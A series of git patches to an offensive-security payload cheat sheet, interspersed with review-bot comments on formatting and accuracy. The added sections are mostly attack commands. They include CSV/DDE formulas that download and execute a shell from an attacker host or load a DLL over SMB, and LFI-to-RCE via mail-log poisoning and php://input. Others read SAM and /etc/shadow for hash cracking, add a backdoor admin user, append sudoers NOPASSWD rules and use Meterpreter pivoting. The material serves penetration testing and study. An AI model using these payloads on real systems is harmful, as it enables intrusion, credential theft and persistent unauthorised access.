@@ -128,6 +155,7 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro ```powershell plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server plink -l root -pw mypassword 192.168.18.84 -R +plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445 plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] ``` @@ -155,7 +183,7 @@ unzip ngrok-stable-linux-amd64.zip | Listen - Connect | Normal redirect. | | Connect - Connect | Can’t bind, so connect to bridge two hosts | -## Listen - Listen +### Listen - Listen | Type | Use Case | | :------------- | :------------------------------------------ | @@ -164,7 +192,7 @@ unzip ngrok-stable-linux-amd64.zip | remote host 1 | `ncat localhost 8080 < file` | | remote host 2 | `ncat localhost 9090 > newfile` | -## Listen - Connect +### Listen - Connect | Type | Use Case | | :------------- | :------------------------------------------ | @@ -173,7 +201,7 @@ unzip ngrok-stable-linux-amd64.zip | remote host 1 | `ncat localhost -p 8080 < file` | | remote host 2 | `ncat -l -p 9090 > newfile` | -## Connect - Connect +### Connect - Connect | Type | Use Case | | :------------- | :------------------------------------------ | diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index a95dcbb1..c9382fea 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md 
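Review bot: `+plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445` lacks the `--> ...` explanation that the first line of the block carries, so a reader has to know that `-L` forwards local port 6666 to port 445 on the SSH server's loopback; add it. Note also, for this and the existing lines, that `-pw` leaves the password in the process list and shell history of the host plink runs on, which is why the PuTTY documentation discourages it; a `-i keyfile` variant would be the cleaner example.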
@@ -2,6 +2,19 @@ Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. +## Summary + +* [Tools](#tools) +* [Exploits](#exploits) + * [PHP Extension](#php-extension) + * [Other extensions](#other-extensions) + * [Upload tricks](#upload-tricks) + * [Picture upload with LFI](#picture-upload-with-lfi) + * [Configuration Files](#configuration-files) + * [CVE - Image Tragik](#cve---image-tragik) +* [References](#references) + + ## Tools - [Fuxploider](https://github.com/almandin/fuxploider) @@ -30,6 +43,15 @@ Double extensions .png.php ``` +### Other extensions + +```powershell +asp : .asp, .aspx +perl: .pl, .pm, .cgi, .lib +jsp : .jsp, .jspx, .jsw, .jsv, .jspf +Coldfusion: .cfm, .cfml, .cfc, .dbm +``` + ### Upload tricks - Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()` From 5d4f65720a9dffe82d4850ac98f5ad1581a4658a Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 9 Jun 2019 20:53:41 +0200 Subject: [PATCH 006/222] PrivEsc - Common Exploits --- CSV Injection/README.md | 8 ++++ .../Linux - Privilege Escalation.md | 44 +++++++++++++++++++ .../Methodology and enumeration.md | 12 +++++ .../Windows - Privilege Escalation.md | 1 - .../Windows - Using credentials.md | 3 +- 5 files changed, 66 insertions(+), 2 deletions(-) diff --git a/CSV Injection/README.md b/CSV Injection/README.md index 126105d6..5261b09c 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md 
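Review bot: the `Other extensions` entries are inconsistently formatted (`perl:` lacks the alignment space the other keys have, `Coldfusion` should be `ColdFusion`), and a fenced block is an odd container for a platform-to-extension mapping; a two-column table (Platform / Extensions) would fit the summary-first structure this patch introduces. Separately, the Summary hunk leaves two blank lines before `## Tools`.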
@@ -7,10 +7,18 @@ Many web applications allow the user to download content such as templates for i Basic exploit with Dynamic Data Exchange ```powershell +# pop a calc DDE ("cmd";"/C calc";"!A0")A0 @SUM(1+1)*cmd|' /C calc'!A0 + +# pop a notepad =cmd|' /C notepad'!'A1' + +# powershell download and execute =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 + +# msf smb delivery with rundll32 +=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 ``` Technical Details of the above payload: diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 36820bcc..09af954d 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -43,6 +43,11 @@ * [Groups](#groups) * [Docker](#docker) * [LXC/LXD](#lxclxd) +* [Common Exploits](#common-exploits) + * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow) + * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds) + * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson) + * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper) ## Checklists 
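Review bot: `+=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1` hardcodes `10.0.0.1` while the line above uses the `attacker_server` placeholder; use the same placeholder so readers recognise the value to change. The comment `# msf smb delivery with rundll32` refers to a server-side component the block never names, so either name what serves the share or describe the payload plainly as a DLL loaded from a UNC path.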
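Review bot: the four new Summary links are unlikely to resolve: `(#[CVE-2010-3904-rds)` has a stray `[`, and all four use uppercase `CVE-...` whereas GitHub generates lowercase ids for these headings, so lowercase them to be safe: `#cve-2016-5195-dirtycow`, `#cve-2010-3904-rds`, `#cve-2010-4258-full-nelson`, `#cve-2012-0056-mempodipper`.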
@@ -537,6 +542,45 @@ lxc exec mycontainer /bin/sh Alternatively https://github.com/initstring/lxd_root + +## Common Exploits + +### CVE-2016-5195 (DirtyCow) + +Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 + +```powershell +# make dirtycow stable +echo 0 > /proc/sys/vm/dirty_writeback_centisecs +g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil +https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs +``` + +### CVE-2010-3904 (RDS) + +Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 + +```powershell +https://www.exploit-db.com/exploits/15285/ +``` + +### CVE-2010-4258 (Full Nelson) + +Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) + +```powershell +https://www.exploit-db.com/exploits/15704/ +``` + +### CVE-2012-0056 (Mempodipper) + +Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) + +```powershell +https://www.exploit-db.com/exploits/18411 +``` + + ## References - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) diff --git a/Methodology and Resources/Methodology and enumeration.md b/Methodology and Resources/Methodology and enumeration.md index 65cd22d2..8270db14 100644 --- a/Methodology and Resources/Methodology and enumeration.md +++ b/Methodology and Resources/Methodology and enumeration.md @@ -176,6 +176,18 @@ masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 index: 0x8 Account: root Name: root Desc: (null) ``` +* Zone Transfer + + ```powershell + host -t ns domain.local + domain.local name server master.domain.local. + + host master.domain.local + master.domain.local has address 192.168.1.1 + + dig axfr domain.local @192.168.1.1 + ``` + ## List all the subdirectories and files * Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code. 
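Review bot: The `powershell` blocks under `### CVE-2010-3904 (RDS)`, `### CVE-2010-4258 (Full Nelson)` and `### CVE-2012-0056 (Mempodipper)` each contain nothing but an exploit-db URL, and the DirtyCow block mixes a `g++` build line with a bare wiki URL; URLs belong in prose as markdown links, with only the commands fenced. The bound `Linux Kernel <= 3.19.0-73.8` in the DirtyCow line reads like a distribution package version rather than an upstream kernel version; cite the upstream affected range and the fixing release so a reader can check whether a given host is patched. `echo 0 > /proc/sys/vm/dirty_writeback_centisecs` changes a system-wide tunable and the comment `# make dirtycow stable` should say so.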
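Review bot: The new `* Zone Transfer` item fences `host` and `dig` output as `powershell` although they are Unix tools; use a plain fence, and mark `domain.local` and `192.168.1.1` as placeholders. A successful `dig axfr domain.local @192.168.1.1` is itself the finding, so one sentence stating the fix (AXFR restricted to authorised secondaries) would make the item useful to defenders reading the checklist.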
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 5e820c0a..87852a24 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -603,7 +603,6 @@ $ computer = "" [System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) ``` - ## EoP - Common Vulnerabilities and Exposure ### Token Impersonation (RottenPotato) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 0234bbbb..17f22cf5 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -5,7 +5,8 @@ ```powershell net user hacker hacker1234* /add net localgroup administrators hacker /add -net localgroup "Remote Desktop Users" hacker /add +net localgroup "Remote Desktop Users" hacker /add # RDP access +net localgroup "Backup Operators" hacker /add # Full access to files net group "Domain Admins" hacker /add /domain ``` From a85fa5af28c7ff47a5674d3fb4315c04d7d9a45a Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 10 Jun 2019 00:05:47 +0200 Subject: [PATCH 007/222] Local File Include : rce via mail + kadimus --- File Inclusion/README.md | 73 ++++++++++++++++++- .../Linux - Privilege Escalation.md | 9 ++- .../Windows - Privilege Escalation.md | 12 ++- 3 files changed, 85 insertions(+), 9 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index c6b17b15..25cd148f 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md 
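Review bot: The inline comment `# Full access to files` on the new `net localgroup "Backup Operators" hacker /add` line overstates what the group grants: membership confers the backup and restore privileges, which let a member read and write any file through backup semantics regardless of ACLs, not ordinary full control. Stating it that way also tells defenders why that group should be audited like the administrators group. Note that the `#` comments on these lines are only safe because the block is fenced as `powershell`; in `cmd.exe` the text after `#` would be passed to `net` as extra arguments.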
@@ -27,6 +27,7 @@ * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo) * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) +* [LFI to RCE via credentials files](#lfi-o-rce-via-credentials-files) ## Tools @@ -119,7 +120,12 @@ can be chained with a compression wrapper for large files. http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd ``` -NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s` +NOTE: Wrappers can be chained multiple times : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s` + +```powershell +./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page +curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php +``` ### Wrapper zip:// @@ -150,11 +156,16 @@ http://example.com/index.php?page=expect://ls ### Wrapper input:// -Specify your payload in the POST parameters +Specify your payload in the POST parameters, this can be done with a simple `curl` command. ```powershell -http://example.com/index.php?page=php://input -POST DATA: +curl -X POST --data "" "https://example.com/index.php?page=php://input%00" -k -v +``` + +Alternatively, Kadimus has a module to automate this attack. + +```powershell +./kadimus -u "https://example.com/index.php?page=php://input%00" -C '' -T input ``` ### Wrapper phar:// 
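Review bot: The new summary entry links to `#lfi-o-rce-via-credentials-files`, but the heading added later in this same patch is `## LFI to RCE via credentials files`, so the anchor should be `#lfi-to-rce-via-credentials-files`.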
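Review bot: In the `### Wrapper input://` hunk the replacement `curl -X POST --data "" "https://example.com/index.php?page=php://input%00" -k -v` and the kadimus line `-C ''` both show an empty payload argument, so the example no longer says what is being posted; the removed `POST DATA:` line at least named the parameter. Either restore a visible placeholder for the body or say in prose that the PHP to be executed goes there. `-k` disables certificate verification and deserves a short comment rather than appearing silently.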
@@ -268,6 +279,35 @@ http://example.com/index.php?page=/usr/local/apache/log/error_log http://example.com/index.php?page=/usr/local/apache2/log/error_log ``` +### RCE via Mail + +First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`. + +```powershell +root@kali:~# telnet 10.10.10.10. 25 +Trying 10.10.10.10.... +Connected to 10.10.10.10.. +Escape character is '^]'. +220 straylight ESMTP Postfix (Debian/GNU) +helo ok +250 straylight +mail from: mail@example.com +250 2.1.0 Ok +rcpt to: root +250 2.1.5 Ok +data +354 End data with . +subject: +data2 +. +``` + +In some cases you can also send the email with the `mail` command line. + +```powershell +mail -s "" www-data@10.10.10.10. < /dev/null +``` + ## LFI to RCE via PHP sessions Check if the website use PHP Session (PHPSESSID) @@ -296,6 +336,31 @@ Use the LFI to include the PHP session file login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 ``` +## LFI to RCE via credentials files + +This method require high privileges inside the application in order to read the sensitive files. + +### Windows version + +First extract `sam` and `system` files. + +```powershell +http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam +http://example.com/index.php?page=../../../../../../WINDOWS/repair/system +``` + +Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique. + +### Linux version + +First extract `/etc/shadow` files. + +```powershell +http://example.com/index.php?page=../../../../../../etc/shadow +``` + +Then crack the hashes inside in order to login via SSH on the machine. + ## References * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) 
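Review bot: In the `### RCE via Mail` transcript the address is written `10.10.10.10.` with a trailing dot on the `telnet`, `Trying`, `Connected to` and `mail -s ... www-data@10.10.10.10.` lines; it should be `10.10.10.10`. The sentence `include the log file located at http://example.com/index.php?page=/var/log/mail` conflates the file with the request: the file is `/var/log/mail` and the URL is how it gets included. The `subject:` header in the transcript is empty, so say explicitly that it is the injection point, and `Postfix (Debian/GNU)` in the banner plus `helo ok` should be marked as sample values from a lab host.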
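Review bot: `This method require high privileges` should read `requires`, and `First extract /etc/shadow files` should be singular. The Windows paths `WINDOWS/repair/sam` and `WINDOWS/repair/system` are backup copies that only some Windows versions keep in that location; the doc should say which, otherwise readers will assume every host has them. The sentence `Then extract hashes from these files samdump2 SYSTEM SAM > hashes.txt` would be clearer with the command in its own fenced line.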
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 09af954d..681ef8a9 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -43,7 +43,7 @@ * [Groups](#groups) * [Docker](#docker) * [LXC/LXD](#lxclxd) -* [Common Exploits](#common-exploits) +* [Kernel Exploits](#kernel-exploits) * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow) * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds) * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson) @@ -542,8 +542,13 @@ lxc exec mycontainer /bin/sh Alternatively https://github.com/initstring/lxd_root +## Kernel Exploits -## Common Exploits +Precompiled exploits can be found inside these repositories, run them at your own risk ! +* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits) +* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/) + +The following exploits are known to work well. ### CVE-2016-5195 (DirtyCow) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 87852a24..bb4b6da2 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -94,7 +94,6 @@ List all users ```powershell net user -net user Swissky whoami /all Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name @@ -250,7 +249,7 @@ REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList ### Passwords in unattend.xml -Location of the unattend.xml files +Location of the unattend.xml files. ```powershell C:\unattend.xml @@ -265,7 +264,7 @@ Example content ```powershell - *SENSITIVE*DATA*DELETED* + U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo== true Administrateur 
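Review bot: `The following exploits are known to work well.` is unsupported as written; each subsection already gives a kernel range, so say there on which distribution or kernel the exploit was verified instead. The `run them at your own risk !` caution is fine but has a space before `!`. The context lines of this hunk also show that the summary still carries the broken `#[CVE-2010-3904-rds)` anchor and the uppercase `#CVE-...` anchors after the rename to `## Kernel Exploits`.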
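Review bot: The new example value `U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==` has two trailing `=` characters, while the decode example added in the next hunk uses `U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=`; the correct padding for that string is a single `=`, and `base64 -d` rejects the `==` form as invalid input, so the two should match. Replacing `*SENSITIVE*DATA*DELETED*` also drops useful context: that marker is what a reader sees in an `unattend.xml` whose password has already been scrubbed, so keep a sentence saying that when it appears there is nothing to decode.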
@@ -281,6 +280,13 @@ Example content ``` +Unattend credentials are stored in base64 and can be decoded manually with base64. + +```powershell +$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d +SecretSecurePassword1234* +``` + The Metasploit module `post/windows/gather/enum_unattend` looks for these files. ### IIS Web config From 94a60b43d683837523024845f19b97b1d984e201 Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 10 Jun 2019 11:00:54 +0200 Subject: [PATCH 008/222] Writable /etc/sudoers + Meterpreter autoroute --- .../Linux - Privilege Escalation.md | 15 +++++++++-- .../Network Pivoting Techniques.md | 27 ++++++++++++++++--- 2 files changed, 37 insertions(+), 5 deletions(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 681ef8a9..6afe24ea 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -7,7 +7,7 @@ ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t ``` - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) -- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123) +- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) - [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) ## Summary @@ -35,7 +35,8 @@ * [sudo_inject](#sudo-inject) * [GTFOBins](#gtfobins) * [Wildcard](#wildcard) -* [Writable /etc/passwd](#writable---etc---passwd) +* [Writable /etc/passwd](#writable-etcpasswd) +* [Writable /etc/sudoers](#writable-etcsudoers) * [NFS Root Squashing](#nfs-root-squashing) * [Shared Library](#shared-library) * [ldconfig](#ldconfig) 
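Review bot: `Unattend credentials are stored in base64 and can be decoded manually with base64` should make explicit that base64 is reversible encoding, not encryption, so anyone who can read the file recovers the cleartext; that is the point a hardening reader needs (answer files should not be left on deployed hosts). The `$ echo ... | base64 -d` example is fenced as `powershell` but is a Unix shell pipeline, so use a plain fence or drop the `$` prompt for consistency with the surrounding blocks.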
@@ -399,6 +400,16 @@ su - dummy NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. +## Writable /etc/sudoers + +```powershell +echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers + +# use SUDO without password +echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers +``` + + ## NFS Root Squashing When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index e35bc19f..9ef65ace 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -103,15 +103,36 @@ optional arguments: ## Metasploit -```c -portfwd list +```powershell +# Meterpreter list active port forwards +portfwd list + +# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell +portfwd add –l 3389 –p 3389 –r target-host portfwd add -l 88 -p 88 -r 127.0.0.1 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 +# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell +portfwd delete –l 3389 –p 3389 –r target-host +# Meterpreter delete all port forwards +portfwd flush + or -run autoroute -s 192.168.57.0/24 +# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0 +run autoroute -s 192.168.15.0/24 use auxiliary/server/socks4a + +# Meterpreter list all active routes +run autoroute -p + +route #Meterpreter view available networks the compromised host can access +# Meterpreter add route for 192.168.14.0/24 via Session number. +route add 192.168.14.0 255.255.255.0 3 +# Meterpreter delete route for 192.168.14.0/24 via Session number. +route delete 192.168.14.0 255.255.255.0 3 +# Meterpreter delete all routes +route flush ``` ## sshuttle 
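Review bot: In `## Writable /etc/sudoers`, the first line `echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers` lacks the space before `>>` that the second line has; align them. The section also needs its precondition stated: sudo refuses to run with a sudoers file whose mode allows group or world writes, so the case in which this applies (the file writable through some other privileged path rather than loose permissions) should be spelled out, otherwise the technique as described contradicts sudo's own check.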
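Review bot: The lines `portfwd add –l 3389 –p 3389 –r target-host` and `portfwd delete –l 3389 –p 3389 –r target-host` use en-dash characters (U+2013) instead of ASCII `-`, so they fail if pasted into Meterpreter; the neighbouring `portfwd add -l 88 -p 88 -r 127.0.0.1` uses the right character. The comment above `portfwd delete` is a copy of the `add` comment (`Forwards 3389 (RDP) to 3389 ...`) and should say that it removes the forward. The bare `or` sitting between the two halves of the block is prose and belongs outside the fence, and `Meterpreters autoroute script` needs an apostrophe (`Meterpreter's`).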
From 8cec2e0ca3377c35d779ad60f92c5e99a3143f52 Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 10 Jun 2019 11:09:02 +0200 Subject: [PATCH 009/222] Linux PrivEsc - Writable files --- .../Linux - Privilege Escalation.md | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 6afe24ea..f46d0ea8 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -35,8 +35,9 @@ * [sudo_inject](#sudo-inject) * [GTFOBins](#gtfobins) * [Wildcard](#wildcard) -* [Writable /etc/passwd](#writable-etcpasswd) -* [Writable /etc/sudoers](#writable-etcsudoers) +* [Writable files](#writable-files) + * [Writable /etc/passwd](#writable-etcpasswd) + * [Writable /etc/sudoers](#writable-etcsudoers) * [NFS Root Squashing](#nfs-root-squashing) * [Shared Library](#shared-library) * [ldconfig](#ldconfig) @@ -369,8 +370,13 @@ tar cf archive.tar * Tool: [wildpwn](https://github.com/localh0t/wildpwn) +## Writable files -## Writable /etc/passwd +```powershell +find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null +``` + +### Writable /etc/passwd First generate a password with one of the following commands @@ -400,7 +406,7 @@ su - dummy NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. -## Writable /etc/sudoers +### Writable /etc/sudoers ```powershell echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers From 24a05c7098812ed6ce46608ec0d0a3d17a610fa6 Mon Sep 17 00:00:00 2001 From: Dan Borges Date: Tue, 11 Jun 2019 11:51:09 -0700 Subject: [PATCH 010/222] Update Windows - Privilege Escalation.md --- Methodology and Resources/Windows - Privilege Escalation.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
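Review bot: In the new `## Writable files` block, `find / -writable ! -user \`whoami\` -type f ...` escapes the backticks with backslashes inside a fenced code block, where no escaping is needed; pasted as written, the shell passes the literal text `` `whoami` `` to `-user` and the filter is wrong. Drop the backslashes or write `-user $(whoami)`. Moving `Writable /etc/passwd` and `Writable /etc/sudoers` to `###` under this heading matches the summary nesting introduced in the same patch.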
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index bb4b6da2..e4f97a54 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -665,7 +665,7 @@ python ms08-067.py 10.0.0.1 6 445 ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) -Check if the patch is installed : `wmic qfe list | find "3139914"` +Check if the patch is installed : `wmic qfe list | findstr "3139914"` ```powershell Powershell: @@ -733,4 +733,4 @@ python2 send_and_execute.py 10.0.0.1 revshell.exe * [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/) * [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/) * [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/) -* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) \ No newline at end of file +* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) From 9745e67465492e7805ba3a9cf4aa5a4bd5361ae0 Mon Sep 17 00:00:00 2001 
From: Swissky Date: Sun, 16 Jun 2019 23:45:52 +0200 Subject: [PATCH 011/222] HQL Injection + references update --- AWS Amazon Bucket S3/README.md | 2 + CSRF Injection/README.md | 28 +++++++--- CSV Injection/README.md | 5 +- File Inclusion/README.md | 1 + .../Active Directory Attack.md | 13 +++++ .../Network Pivoting Techniques.md | 12 +++++ .../Reverse Shell Cheatsheet.md | 9 +++- .../Windows - Privilege Escalation.md | 7 ++- SQL Injection/HQL Injection.md | 51 +++++++++++++++++++ Upload Insecure Files/README.md | 1 + XXE Injection/README.md | 50 +++++++++++++++--- 11 files changed, 160 insertions(+), 19 deletions(-) create mode 100644 SQL Injection/HQL Injection.md diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 10221757..8b7b51b7 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -192,3 +192,5 @@ For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws * [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/) * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud) * [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/) +* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/) +* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/) \ No newline at end of file diff --git a/CSRF Injection/README.md b/CSRF Injection/README.md index 7deed48b..01a39fee 100644 --- a/CSRF Injection/README.md +++ b/CSRF Injection/README.md 
@@ -7,6 +7,17 @@ * [Methodology](#methodology) * [Payloads](#payloads) + * [HTML GET - Requiring User Interaction](#) + * [HTML GET - No User Interaction)](#) + * [HTML POST - Requiring User Interaction](#) + * [HTML POST - AutoSubmit - No User Interaction](#) + * [JSON GET - Simple Request](#) + * [JSON POST - Simple Request](#) + * [JSON POST - Complex Request](#) + +## Tools + +* [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe) ## Methodology @@ -16,19 +27,19 @@ When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it. -### HTML GET – Requiring User Interaction for Proof-of-Concept +### HTML GET - Requiring User Interaction ```html Click Me ``` -### HTML GET (No User Interaction) +### HTML GET - No User Interaction ```html ``` -### HTML POST – Requiring User Interaction for Proof-of-Concept +### HTML POST - Requiring User Interaction ```html
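Review bot: All seven new summary entries link to `(#)`, so none of them resolves; fill in the heading slugs (for example `#html-get---requiring-user-interaction`, following the `---` convention this repository already uses for headings containing ` - `). `HTML GET - No User Interaction)` has a stray closing parenthesis. Renaming the headings from en-dash to `-` in the same patch is the right move, since it makes those slugs predictable.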

@@ -37,7 +48,7 @@ When you are logged in to a certain site, you typically have a session. The iden ``` -### HTML POST (AutoSubmit – No User Interaction) +### HTML POST - AutoSubmit - No User Interaction ```html
